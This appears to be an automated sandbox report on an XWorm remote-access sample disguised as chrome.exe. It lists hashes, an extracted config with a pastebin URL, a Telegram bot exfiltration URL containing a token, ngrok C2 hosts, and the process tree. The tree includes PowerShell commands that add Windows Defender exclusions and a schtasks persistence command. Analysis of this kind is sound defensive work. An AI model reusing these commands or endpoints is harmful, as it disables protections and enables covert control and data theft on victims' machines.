Analysis
-
max time kernel
597s -
max time network
599s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
30-05-2024 14:51
Behavioral task
behavioral1
Sample
chrome.exe
Resource
win10-20240404-en
General
-
Target
chrome.exe
-
Size
183KB
-
MD5
2b26b084c03ef96db3cda61ec42b9780
-
SHA1
d285abb4911dbb747b8cc0fb61d90c424905d71f
-
SHA256
21dcb388ee5eeb9ff54802794de0a765b7a4613d93dd6564694e88e48a75c798
-
SHA512
9fff7138ce7101c78e67e2f41181876b67d76c134757c61e151af5ffbca647b6fe965d60a41666f0dabf3508e0c43f6a56126c048ffc00bfe5909221732d2271
-
SSDEEP
3072:k0SK4dXl19I2pbXwo5MObaQ04NpVq8BxFRzaqF+o2GQJ7/JzqVfGvc:34dFI2pbgeM/gVqwlL
Malware Config
Extracted
xworm
-
Install_directory
%Userprofile%
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/0hUbjRaB
-
telegram
https://api.telegram.org/bot7166866838:AAHZkNz5kuPxP-6aLkd_O3PTozWCCuLQp-w/sendMessage?chat_id=6817832744
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/3780-0-0x0000000000340000-0x0000000000374000-memory.dmp family_xworm C:\Users\Admin\chrome family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 4312 powershell.exe 3860 powershell.exe 192 powershell.exe 5104 powershell.exe -
Drops startup file 2 IoCs
Processes:
chrome.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.lnk chrome.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.lnk chrome.exe -
Executes dropped EXE 10 IoCs
Processes:
chromechromechromechromechromechromechromechromechromechromepid process 2040 chrome 3404 chrome 2460 chrome 3100 chrome 4280 chrome 2620 chrome 3928 chrome 4856 chrome 1536 chrome 4248 chrome -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
chrome.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\chrome = "C:\\Users\\Admin\\chrome" chrome.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs
Processes:
flow ioc 5 pastebin.com 42 0.tcp.eu.ngrok.io 80 0.tcp.eu.ngrok.io 23 0.tcp.eu.ngrok.io 51 0.tcp.eu.ngrok.io 67 0.tcp.eu.ngrok.io 72 0.tcp.eu.ngrok.io 88 0.tcp.eu.ngrok.io 96 0.tcp.eu.ngrok.io 11 0.tcp.eu.ngrok.io 40 0.tcp.eu.ngrok.io 60 0.tcp.eu.ngrok.io 90 0.tcp.eu.ngrok.io 4 pastebin.com 49 0.tcp.eu.ngrok.io 65 0.tcp.eu.ngrok.io -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exechrome.exepid process 192 powershell.exe 192 powershell.exe 192 powershell.exe 5104 powershell.exe 5104 powershell.exe 5104 powershell.exe 4312 powershell.exe 4312 powershell.exe 4312 powershell.exe 3860 powershell.exe 3860 powershell.exe 3860 powershell.exe 3780 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3780 chrome.exe Token: SeDebugPrivilege 192 powershell.exe Token: SeIncreaseQuotaPrivilege 192 powershell.exe Token: SeSecurityPrivilege 192 powershell.exe Token: SeTakeOwnershipPrivilege 192 powershell.exe Token: SeLoadDriverPrivilege 192 powershell.exe Token: SeSystemProfilePrivilege 192 powershell.exe Token: SeSystemtimePrivilege 192 powershell.exe Token: SeProfSingleProcessPrivilege 192 powershell.exe Token: SeIncBasePriorityPrivilege 192 powershell.exe Token: SeCreatePagefilePrivilege 192 powershell.exe Token: SeBackupPrivilege 192 powershell.exe Token: SeRestorePrivilege 192 powershell.exe Token: SeShutdownPrivilege 192 powershell.exe Token: SeDebugPrivilege 192 powershell.exe Token: SeSystemEnvironmentPrivilege 192 powershell.exe Token: SeRemoteShutdownPrivilege 192 powershell.exe Token: SeUndockPrivilege 192 powershell.exe Token: SeManageVolumePrivilege 192 powershell.exe Token: 33 192 powershell.exe Token: 34 192 powershell.exe Token: 35 192 powershell.exe Token: 36 192 powershell.exe Token: SeDebugPrivilege 5104 powershell.exe Token: SeIncreaseQuotaPrivilege 5104 powershell.exe Token: SeSecurityPrivilege 5104 powershell.exe Token: SeTakeOwnershipPrivilege 5104 powershell.exe Token: SeLoadDriverPrivilege 5104 powershell.exe Token: SeSystemProfilePrivilege 5104 powershell.exe Token: SeSystemtimePrivilege 5104 powershell.exe Token: SeProfSingleProcessPrivilege 5104 powershell.exe Token: SeIncBasePriorityPrivilege 5104 powershell.exe Token: SeCreatePagefilePrivilege 5104 powershell.exe Token: SeBackupPrivilege 5104 powershell.exe Token: SeRestorePrivilege 5104 powershell.exe Token: SeShutdownPrivilege 5104 powershell.exe Token: SeDebugPrivilege 5104 powershell.exe Token: SeSystemEnvironmentPrivilege 5104 powershell.exe Token: SeRemoteShutdownPrivilege 5104 powershell.exe Token: SeUndockPrivilege 5104 powershell.exe Token: SeManageVolumePrivilege 5104 powershell.exe Token: 33 5104 powershell.exe Token: 34 5104 powershell.exe Token: 35 5104 powershell.exe Token: 36 5104 powershell.exe Token: SeDebugPrivilege 4312 powershell.exe Token: SeIncreaseQuotaPrivilege 4312 powershell.exe Token: SeSecurityPrivilege 4312 powershell.exe Token: SeTakeOwnershipPrivilege 4312 powershell.exe Token: SeLoadDriverPrivilege 4312 powershell.exe Token: SeSystemProfilePrivilege 4312 powershell.exe Token: SeSystemtimePrivilege 4312 powershell.exe Token: SeProfSingleProcessPrivilege 4312 powershell.exe Token: SeIncBasePriorityPrivilege 4312 powershell.exe Token: SeCreatePagefilePrivilege 4312 powershell.exe Token: SeBackupPrivilege 4312 powershell.exe Token: SeRestorePrivilege 4312 powershell.exe Token: SeShutdownPrivilege 4312 powershell.exe Token: SeDebugPrivilege 4312 powershell.exe Token: SeSystemEnvironmentPrivilege 4312 powershell.exe Token: SeRemoteShutdownPrivilege 4312 powershell.exe Token: SeUndockPrivilege 4312 powershell.exe Token: SeManageVolumePrivilege 4312 powershell.exe Token: 33 4312 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
chrome.exepid process 3780 chrome.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
chrome.exedescription pid process target process PID 3780 wrote to memory of 192 3780 chrome.exe powershell.exe PID 3780 wrote to memory of 192 3780 chrome.exe powershell.exe PID 3780 wrote to memory of 5104 3780 chrome.exe powershell.exe PID 3780 wrote to memory of 5104 3780 chrome.exe powershell.exe PID 3780 wrote to memory of 4312 3780 chrome.exe powershell.exe PID 3780 wrote to memory of 4312 3780 chrome.exe powershell.exe PID 3780 wrote to memory of 3860 3780 chrome.exe powershell.exe PID 3780 wrote to memory of 3860 3780 chrome.exe powershell.exe PID 3780 wrote to memory of 756 3780 chrome.exe schtasks.exe PID 3780 wrote to memory of 756 3780 chrome.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\chrome.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'chrome.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\chrome'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'chrome'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3860
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "chrome" /tr "C:\Users\Admin\chrome"2⤵
- Creates scheduled task(s)
PID:756
-
-
C:\Users\Admin\chromeC:\Users\Admin\chrome1⤵
- Executes dropped EXE
PID:2040
-
C:\Users\Admin\chromeC:\Users\Admin\chrome1⤵
- Executes dropped EXE
PID:3404
-
C:\Users\Admin\chromeC:\Users\Admin\chrome1⤵
- Executes dropped EXE
PID:2460
-
C:\Users\Admin\chromeC:\Users\Admin\chrome1⤵
- Executes dropped EXE
PID:3100
-
C:\Users\Admin\chromeC:\Users\Admin\chrome1⤵
- Executes dropped EXE
PID:4280
-
C:\Users\Admin\chromeC:\Users\Admin\chrome1⤵
- Executes dropped EXE
PID:2620
-
C:\Users\Admin\chromeC:\Users\Admin\chrome1⤵
- Executes dropped EXE
PID:3928
-
C:\Users\Admin\chromeC:\Users\Admin\chrome1⤵
- Executes dropped EXE
PID:4856
-
C:\Users\Admin\chromeC:\Users\Admin\chrome1⤵
- Executes dropped EXE
PID:1536
-
C:\Users\Admin\chromeC:\Users\Admin\chrome1⤵
- Executes dropped EXE
PID:4248
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD516c5fce5f7230eea11598ec11ed42862
SHA175392d4824706090f5e8907eee1059349c927600
SHA25687ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
1KB
MD568a1eec0cc923c6e7d7b83422ffc08b4
SHA14091f5622f97103d0501f220452699cdf329cb35
SHA25626e337536d5aaa4683bb85e317778d02954eb076a4898f8e8a1a38c0c70c423a
SHA51242e55d34ad8e0a65e5f00ce26c9b0e6c914278c8d03cece7ddbb2fef0ee0a7c229547acd7ca9ed6e54df545c8f28b6b982c28b9b45eb0aff723bcd440ba91980
-
Filesize
1KB
MD59ab0d79b6ea2fb17b006c4c2c5c05084
SHA1238d7803bf6d67dfd6cb45d4c3f4a20a804f230a
SHA2567ebbda07e65800a519800abfbbcafa1af50cff28db3674b0b2ae9361674fc156
SHA5124ffb6af87dbb9c102c062c95e843c25c97bf8f8d616863347d3d58f6eb7cfabe4aa2d848c3dfb421558aaeb0ea069820fe5f480f97e4576bcceb4324c830eb6b
-
Filesize
1KB
MD562c8561f755430780a652d626c597227
SHA1c30910319267f5bd2942d20334f29f8117788a2f
SHA256e2ef29f0c46e5e534cf2e39c70f9be50ba0fc248b009015c1d768a7892c6b75b
SHA51212e52c18417f2b77db9d34f9b043cc962c3806ecf7ddd2f915280d173a0803e6a880cf5f6243bbd65cbe377a52d335f704d0b0cb38f48d2defe6752aaf72d3b8
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
183KB
MD52b26b084c03ef96db3cda61ec42b9780
SHA1d285abb4911dbb747b8cc0fb61d90c424905d71f
SHA25621dcb388ee5eeb9ff54802794de0a765b7a4613d93dd6564694e88e48a75c798
SHA5129fff7138ce7101c78e67e2f41181876b67d76c134757c61e151af5ffbca647b6fe965d60a41666f0dabf3508e0c43f6a56126c048ffc00bfe5909221732d2271